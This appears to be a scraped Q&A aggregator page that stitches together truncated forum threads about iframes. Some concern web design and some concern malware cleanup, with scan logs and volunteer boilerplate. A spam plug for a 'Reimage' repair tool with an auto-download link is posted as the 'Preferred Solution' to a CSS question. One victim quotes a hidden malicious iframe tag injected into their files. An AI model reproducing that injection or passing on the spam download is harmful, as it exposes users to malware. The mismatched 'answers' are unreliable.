Over 1 million tech questions and answers.

Formatting an IFRAME

Q: Formatting an IFRAME

On my site, I have darkish colors; blue, grayish-black, etc. But I have an IFRAME of a page from another site, which has white background and black text, so it doesnt fit in with my page. I already have the CSS for my page colors, can I apply this to the Iframe, or is there another way I can change its background color?

Since the Iframed page is on someone else's site, I can not modify that file itself. And many of you will probably tell me an iframe is not good to use in page design, I have decided its the best way to accomplish what I want.

RELEVANCY SCORE 200
Preferred Solution: Formatting an IFRAME

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: Formatting an IFRAME

if you know this person and they're okay with you mirroring their site, you could ask them to use DIV id's and SPAN id's and set their tags to CSS id's that you know of, then name your CSS id's the same. you'd have to put a LINK REL tag in the HEAD and both you and the person who owns the site would need to have it point to CSS in the main directory with the same file name. everything would have to correlate.

Read other 2 answers
RELEVANCY SCORE 55.2

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers
RELEVANCY SCORE 38.8

Last night, I tried to transfer a video file as I've done dozens of times. It didn't work. I tried a second time and realized it was because the file was more than 4GB which FAT32 USB drives will not accept.

I successfully formatted the new USB drive to NTFS.

My question is can I convert it back to FAT32? Can I do this using the same method (right-click drive checked off and optimized performance then right-click and select NTFS) I did from FAT32 to NTFS or is something else required?

Is it dangerous to due this? I will only be using this USB stick on my Windows laptops, dvd player and not on my iMac.

A:USB drive formatting back to FAT32 after formatting to NTFS

Hi and welcome to SevenForums,

You are correct, you can just format the drive back to FAT32 and no it shouldn't cause any issues doing this.
I have swapped between file system types many times and never had an issue.

Regards,
Jamie

Read other 2 answers
RELEVANCY SCORE 38.8
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

Read other 1 answers
RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

post the sites url and I will check out the code....... if I can see it.

d.
 

Read other 2 answers
RELEVANCY SCORE 38.8

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrolable too. Can I tell the browser(s) to do this? and how. Please help.
 

A:Still Iframe - Please Help

Read other 12 answers
RELEVANCY SCORE 38.4

on my site i have a link i use for users to view tax records in my county and i would like to have the users not leave my site,so i used an iframe,but im havin an issue after agreeing to their usage terms,users cannot access the site or it doesnt redirect to the corresponding/next page,as in enter here and i cant bypass it because it will auto redirect. any suggestions WITHOUT using a new page or opening in a new window ??

www.townhousesandvillas.com/taxrecords.html

oh and take it easy on me...im new
 

A:iframe or equal...

Read other 16 answers
RELEVANCY SCORE 38.4

In the last week, my computer has started having issues and restarting randomly.  When I try to maximize some videos on youtube, occasionally the video will only cover 1/3 of the screen and immediately freeze.  Avast said everything was good, but I tried a boot scan anyway; it would pop up and identify some infected files, but when I told it to fix them, it would say those files are no longer there.  I can't find the text file that avast apparently made, but I do remember clickjacker and a frame flashing across the screen.  I'd appreciate any help you could give in clearing this up.  
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.16518  BrowserJavaVersion: 10.51.2
Run by Josh at 0:33:52 on 2014-02-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.16382.14153 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\W... Read more

A:Iframe, clickjacker?

Hi Fajen
My name is polskamachina and I will be assisting you with your malware problems. What follows below are some ground rules for this forum.
I will reply as soon as possible (typically within 24-48 hours). In turn, I ask that you please respond within 72 hours. If you know you will be away longer than that, please let me know.
I am in California at GMT-8 Hours (Pacific Standard Time). If I do not respond to you within 48 hours, feel free to send me a private message.
Some points for you to keep in mind:
Do NOT run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Do not attach logs or use code boxes, just copy and paste the text.
I cannot see your computer. Periodically update me on the condition of your computer, and provide as much detail as you can in every post.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end.
NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a flash drive, anywhere except on the computer.
NOTE: It is good practice to copy and paste the instructions into notepad and print them in ca... Read more

Read other 22 answers
RELEVANCY SCORE 38.4

Avast antivirus is reporting that a number of files have been infected with a trojan called "IFrame-HW [Trj]". It seems to move around to different files, I use Windows Vista and some of the files infected are in hidden folders which I can no longer seem to access. Also, when I tell Avast to move the files to it's chest or to delete they just seem to come right back, sometimes immediately. I'm not sure what effect it is having on my pc, except Mozilla Firefox will no longer function on my pc, I can only browse the net with IE or Opera.
I have also tried using Cyberscrub to clear my free space after deleting infected files, but when I do so I get constant reports of the infection from Avast and Cyberscrub stops responding.
Any help will be greatly appreciated.
DDS (Ver_09-06-26.01) - NTFSx86
Run by olusanya at 16:37:47.03 on Thu 07/09/2009
Internet Explorer: 8.0.6001.18783
Microsoft? Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.2814.1528 [GMT -4:00]

SP: Spybot - Search and Destroy *disabled* (Updated) {ED588FAF-1B8F-43B4-ACA8-8E3C85DADBE9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32... Read more

A:Infected with IFrame-HW [Trj]

Pardon me... I left out the fact that it also seems to have disabled the protective mode of IE, leaving it vulnerable.Hello nu2cpu,We ask that once you have posted your log and are waiting, please DO NOT "bump" your thread or make further replies until it has been responded to by a member of the HJT Team. The reason we ask this or do not respond to your requests is because that would remove you from the active queue that Techs and Staff have access to. The malware staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response, there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.That is why I have made an edit to your last post, instead of a reply. Please do not multiple post here, as that only pushes you further down the queue and causes confusion to the staff.Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible.Thank you for understanding.Regards,The weatherman (Moderator)

Read other 3 answers
RELEVANCY SCORE 38.4

I have a page index.shtml, and there is an iframe in that page. The iframe is called downloadiframe. Now I have a button in my forums that I want to link to my downloads page.

Here's My problem. When you click the "download" button on my page, you go into my downloads page. But I want it to open index.shtml with the downloads page in the iframe, downloadsiframe. How do I do this?
 

A:IFrame Problems

Read other 8 answers
RELEVANCY SCORE 38.4

I receive frequent emails from my friend's infected computer with random subject lines and random names with his files as an attachment.

Now, the problem is my AVG antivirus and Housecall do not detect any virus in these emails, but pandaactivescan detects this as "Exploit/iFrame".

I have XP pro, IE6 and Outlook express6 and have even installed the patch for this vulnerability that actually affects IE5.5 and IE5.01 only(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp).

IS my computer infected?
 

A:Exploit/iFrame

Read other 9 answers
RELEVANCY SCORE 38.4

ok.... so what i want to do is have an iframe over top of an image (which i have figured out), but then, i want that iframe to have a lower opacity so that you can kind of see the picture that the iframe is over top of. i've read a ton of stuff about transparency and opacity and i've tried a few different things, none seem to work though. i've been able to change the opacity of the iframe fine, but rather than having my image come through, the bg color (which is black) comes through.

please help and thanks in advance

carson

ps - think of it like a layer in photoshop where you can just change the opacity to have the layer behind it show through.
 

A:Need help with iframe opacity...

well I am not too sure, but I think you would have to change the alpha opacity in the code for the page within the iframe. So if your iframe is linkted to "pagename.htm" then you have to use alpha opacity on the "pagename.htm" page, as opposed to the page including the iframe. However, I may be way off track on this one! This is all I can offer is an idea...
 

Read other 2 answers
RELEVANCY SCORE 38.4

I already ran ComboFix before I found the preparation guide saying not to unless instructed - oops.

Iframe.inf infected my sites at Hostgator which they cleaed up overnight. I'm impressed.

Hostgator tech suggested scanning local system using multiple scanners for better results. I use Avast Internet Security and it reported no problems.

Is ComboFix log is enough to tell if infected or do I need to go through all the stuff listed in prep guide.

thanks in advance for any help you can render

ComboFix log below

ComboFix 11-03-11.02 - STAN 03/12/2011 16:09:45.3.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.544 [GMT -5:00]
Running from: c:\downloads\Software\ComboFix.exe
AV: avast! Internet Security *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Disabled* {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\~DFK69783e.tmp
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\1eaadjc.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\bass.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\engine_vx.dll
c:\doc... Read more

A:Iframe.inf infected - yes or no?

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. Please take note: If you have since resolved the original problem you were having, we would appreciate you letting us know. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
If you are unsure about any of these characteristics just post what you can and we will guide you.Please tell us if you have your original Windows CD/DVD available. If you are unable to perform the steps we have recommended please try one more time and if unsuccessful alert us of such and we will design an alternate means of obtaining the necessary information. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic and do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the '... Read more

Read other 3 answers
RELEVANCY SCORE 38.4

I have just had 3 securtiy alert messages from AVIRA,don't know if it would have any connection :
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspiscious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04:02, on 22/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Windows Live\Family Safety\fssui.exe
C:\Program Files\TalkTalk\bin\sprtcmd.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Windows\System32\rundl... Read more

A:JS/Dldr.Iframe.BO

Read other 6 answers
RELEVANCY SCORE 38.4

Hello Gracious Help,I run XP Pro on a Pentium 4, 3ghz (Dell GX270).3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a beastiality site and a zoo site - neither of which I have ever been to.Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-infA web search came up with a few complex suggestions on how to rid of fix this problem, but all were too complex for me to follow.The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such... Read more

A:HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComO... Read more

Read other 41 answers
RELEVANCY SCORE 38.4

Alright here the deal i have a transparent iframe with the content visable but the scrollbars are transparent and i dont want that...so is there anyway to have a transparent iframe with visable content and visable scrollbars?
 

A:Transparent iFRAME

Read other 12 answers
RELEVANCY SCORE 38.4

Hi,
I work on portals. In ePhox editLive editor I am using iFrame which in turns diplay a intranet site with in this iFrame. This site includes a selectbox for locations. When site is displyaed first time select box is not visible to end user but when we click on any button and this page again renders this select box is also available.
I right click on site when select doesnt appears but for my surprize code for select box is there in view source. I am not getting why it is not visible if code is there in view source.
Also, When I open this site in internet explorer without any iframe select box is visible there.

Can anyone please help why it is happening like that??

Regards,
Rohit Sharma

Read other answers
RELEVANCY SCORE 38.4

I m tired of searching about iframe alternative ..... after so much search i cant get what i wanted .

I m trying to include other domain HTML page in my HTML based email templates, Is there any other way to include the html pages from other domain in my HTML coding that is other than iframe?
 

Read other answers
RELEVANCY SCORE 38.4

My PC was working very well and had no problem. I turned off after my work one night and when I switched on the next morning it does not open my home page. When I try to open my antivirus Avast gives me warning. The name of the virus is HTML:Iframe-inf Please help me to get rid of this. I am not able to ope my home Page.
More over my system has become very slow especially during the start up. Please help.
Thank you!

Read other answers
RELEVANCY SCORE 38.4

OS: Server 2008 R2 - SP1

IIS: 7.5.7600.16385

I have an iframe embedded into a web page which displays a pdf.  In chrome and other browsers the pdf displays fine inside the iframe; however, in IE the iframe forces a logout after redirecting them several times.  Chrome also does this redirect
but doesn?t end up forcing a logout.  Copying the source url from the iframe into a new tab in IE doesn?t force the logout and retrieves the pdf just fine which means it is directly related to this server?s handling of iframes specifically in all IE browsers
we support (IE 9+).  This scenario is unique to a specific server and doesn?t happen on ?identical? server environments.

I have used Process Monitor and am not seeing any permission errors or anything that immediately stands out.  If you have any thoughts on how to proceed or have any questions, please let me know.
I have also looked into KB 3154070 without success.

Read other answers
RELEVANCY SCORE 38.4

Description of my problem:We determine in our local network an instability, this is due to spread of malware through in it.The malware uses the method of attack based ARP to the local network Gateway (192.168.1.1).Indeed machine "A" owner of the MAC address "MacA" send packages ARP broadcast on the network indicating that the bridge is the machine A (192.168.1.1(the right address of Gateway) is at "MacA"), so many machines in our network used a wrong ARP i(I mean MACA of infected machines by this malware)After a long check on them to identify this malware. we found : these machines were infected by:svchost.exe" (175 KO, 179200 Bytes) uses the DLL Packet.dll and wpcap.dll and wanpacket.dll ... \ drivers \ npf.sys.- There realize a scan of all networks 192.168- and 172.16- and 10.0-- It has a "80-port insert" in the svchost paquet-at last we have another problem; when we open web page (as IE or Firefox) before we get the response and taking two or three seconds, the page displays a little gray bare (even we use windows or Linux system) and the view page source return this hxxp://218.75.91.248/iframe and this are included in the svchost.exe paquet but it was crypted.- Can somebody help me and explain me haw can we resolve this and clean our local network from this malwre? Thank's in advance

A:Iframe And Arp Spoofing

Please can somebody help me, nobody has an idea about this problem ?

Read other 4 answers
RELEVANCY SCORE 38.4

Hi Folks,From threatpost :New Firefox iFrame Bug Bypasses URL Protections. http://bit.ly/as6VH9CheersKarstenHansen

Read other answers
RELEVANCY SCORE 38.4

I have searched posts here for other virus help and have downloaded the Malwarebytes that was suggested and will put copy on the infected computer. I have run my Avast Antivirus and the OneCare but still have problems.QUESTIONS:1-Does this Malwarebytes program have any problems with other Antivirus progams running?2-Will this program get rid of the iframe virus? 3-I noticed a strange program in my msconfig StartUp it was named freddy42 I have disabled it. I have checked and now know it is part of this virus. 4-Should I have diabled freddy 42? I think that is why I may be still infected.5-Do I need to have all programs enabled in my StartUp to ensure complete virus removal.6- Can the infected computer infect laptop, it is on shared network? I have disabled all sharing folders and files with infected computer.I took a picture of the message as it is loading the bogus page. It says: waiting for res://ieframe.dll/dnserrror.htm. I can't log on anywhere to get more info or help so I am using my laptop now to get work done....

A:IFrame Virus

In answer to question onePrograms that monitor and prevent registry changes such as Spybot S&D Teatimer function and Winpatrol need to be disabledIn answer to number two post a log and we'll take it from thereDisable freddy42 using Autorunshttp://technet.microsoft.com/en-us/sysinte...s/bb963902.aspxNumber 5 - noNumber 6 - yesAre you using a digital picture frame? Whatever USB attachment it is, do not use it right nowI'm moving this to AII-----------------------------------------------------The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-... Read more

Read other 6 answers
RELEVANCY SCORE 38

My kids were on a MySpace page watching videos the other night and now if I try to go online for anything my avast software goes nuts and I get the line in the title. it says it is in the temp. internet files folder. I shut the computer down and let avast do a complete scan and I ran spybaster and AVG. All to no avail. S I come once again to the great guys and gals here at tech support for help. I also have a strange thing happen when I try to move a file, it moves but also brings up a box from Easy CD Creator and wants me to put in the CD to install. I don't even use that program. Weird. Below I have inclosed the files you asked for (DDS & Attach & GMER). Any help would be greatly appreciated.

GMER 1.0.15.14972 - http://www.gmer.net
Rootkit scan 2009-07-09 20:22:20
Windows 5.1.2600 Service Pack 2


---- Kernel code sections - GMER 1.0.15 ----

? srescan.sys The system cannot find the file specified. !
? System32\DRIVERS\AvgAsCln.sys The system cannot find the path specified. !
? C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys The system cannot find the file specified. !

---- User code sections - GMER 1.0.15 ----

.text C:\WINDOWS\system32\NOTE... Read more

A:Infected with hxxp:IFrame-HW[Trj]

Hello -

Please subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Before beginning the fix, read this post completely. If there's anything that you do not understand, kindly ask your questions before proceeding. Ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

It is IMPORTANT that you don't miss a step & perform everything in the correct order/sequence.

---------------------------------------------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Stay with me until given the 'all clear' even if symptoms diminish. Lack of symptoms does not always mean the job is complete.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by me or another helper at this forum.

---------------------------------------------------------------------------------------------

Download ComboFix from this location:

Link 1

* IMPORTANT !!! Place combofix.exe on your Desktop
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the Sy... Read more

Read other 19 answers
RELEVANCY SCORE 38

I hit a website and the browser crashed. I noticed that things started acting wacky after that happened so I jumped on a mac to look at the source of the page. I found someone had injected javascript that opened an iframe and redirected to an 81.x.x.x site in panama. Here's the log. The scary line for me is :O4 - HKLM\..\Run: [xxy_Shell] C:\Documents and Settings\JDOE\xxy_rawv.exe

I've cleaned the files with McAfee but not sure where to go from here other than wiping the drive. I also know exactly when it hit so could I use the XP resetore? Any ideas are greatly appreciated.

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 3:46:07 PM, on 4/20/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ngvpnmgr.exe
C:\Program Files\Cisco Systems\SSL VPN Client\agent.exe
C:\Program Files\Juniper\NetScreen-Remote\IreIKE.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Juniper\NetScreen-Remote\IPSecMon.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
c:\PR... Read more

A:HJT log after iframe/redirect to Panama

Hi and welcome to TSF.

Apologies for any delay in replying, but we have been rather busy lately, and, of course, all our helpers are volunteers.

Since it has been a few days since you first posted, please follow these instructions if you still need assistance.

Download Deckard's System Scanner (DSS) to your Desktop . Note: You must be logged onto an account with administrator privileges.Close all applications and windows.
Double-click on dss.exe to run it, and follow the prompts.
When the scan is complete, two text files will open - minimised > extra.txt and maximised > main.txt.
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt back in this thread (do not attach it).
Please attach extra.txt to your post.


To attach a file to a new post, simplyClick the[Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box:C:\Deckard\System Scanner\extra.txt

Click Upload.

I will monitor this thread for your reply.

Thank you for your patience.

Read other 1 answers
RELEVANCY SCORE 38

Oops! Wrong subject. I found that on my machine, not on this one.

My dear sweet son neglected to tell me he was having problems on his computer. His Yahoo massenger has suddenly begun malfunctioning throwing a scripting error in every session, refusing to close, then having to boot each session. It now will not start without a boot. He received a video link from a friend (teens, yeah) that took him to an anime site. After viewing the harmless video that came in, it began redirecting to adult videos. My husband uses this computer as well and has never run AV on it, so my son disregarded my instruction that he needed to download and install AV. Below is his HJT log file

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 11:32:26 PM, on 6/21/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Vongo\VongoService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\InfoMyCa.exe
C:\WINDOWS\system32\MsPMSPSv.exe
C:\Program Files\Java\jre1.6.0_01... Read more

A:Solved: Hijacker.IFrame.n

Read other 10 answers
RELEVANCY SCORE 38

Please assist me . I have one very very sick machine on my hand .I must have other virus/trojans on board as well. I have AVAST , (installed after the infestation-) as well as SPYBOT now and AD-Adware now .I had ESET running but that is a useless piece of u know what. I believe someone's thumbnail drive might of caused the infestation in the first place but I am not exactly sure . I can barely connect to the internet - FIREFOX just died and I need to use a proxy to make IE work.,meaning I can't use a direct connection . So my networking files have been hit too. AVAST keeps barking at me every time I try touse explorer and browse a website -it tries to install the IFRAME virus - . When I start up an interenet connection (using wireless now) it tries to reach a malicious site . (again AVAST barks that out to me ) I am using a clean thumbnail drive and another clean computer to use this forum and upload logs etc...... (by the way - I'm in Asia right now so about 12 hours time difference from East coast USA) additional info : it wants to add a global variable rundll process on msgxkyxg.dll which is hiding in system32 - this dll looks benign to adware and myantivirus but it was also somehow hooked to a program HPRBLOG or something like that so I deleted that .exe (killed it with unlocker - then deleted it)Also deleted the msgxkyxg.dll but something tells me they will be back on next rebootI could not successfully run the DDS.scr - kept complaining about a missing "... Read more

A:Help- Have Iframe-inf & multiple infestations

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.Please download OTL from following mirror:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Push the button.Two reports will open, copy and paste them in a reply 